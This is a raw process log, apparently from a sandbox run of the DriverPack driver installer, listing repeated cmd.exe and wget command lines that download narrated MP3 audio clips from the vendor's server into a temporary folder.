"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/WAITING-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40761.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_40761.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/WAITING-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_22603.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_22603.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/WAITING-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40761.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/WAITING-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_22603.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_88817.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_88817.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_58321.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_58321.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_88817.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_58321.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6102.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_6102.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_10870.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_10870.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24155.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_24155.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_13029.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_13029.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_10870.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6102.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24155.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FIREFOX_4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_13029.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/UTILS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_97663.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_97663.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/UTILS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_65768.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_65768.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/UTILS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_97663.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/UTILS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_65768.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_60786.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_60786.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_80283.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_80283.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_93104.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_93104.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_60786.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_80283.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/RELIABILITY-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_93104.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CHECKING-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57914.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_57914.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CHECKING-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18839.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_18839.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CHECKING-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18839.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CHECKING-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57914.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REVIEWS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44906.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_44906.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REVIEWS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_48654.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_48654.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16707547021773428612895987503-2343468911458370985-554678015-1199762087132428058"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REVIEWS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44906.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REVIEWS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_48654.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-all-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57316.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_57316.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-all-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57316.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_33701.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_33701.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_35328.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_35328.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_38065.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_38065.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_39231.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_39231.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1628852781-837193401596138875-13447128911138412167349229480-993236283-709490814"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44838.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_44838.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "18075808951992605927-457166115166518619178225887-35337259312892647112126966841"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_33701.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44838.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_38065.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_39231.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_35328.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_21243.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_21243.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_83066.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_83066.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_62776.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_62776.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_29935.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_29935.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_21243.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_62776.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_83066.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-adout-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_29935.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72316.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_72316.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_83042.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_83042.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_56550.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_56550.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51382.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_51382.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1388988505-12077956651330151620-1368074314-154566796613140781551480101199486226643"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_52259.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_52259.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1915089416-856814962891270461192073904930191240617581366391876746584-1435510453"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

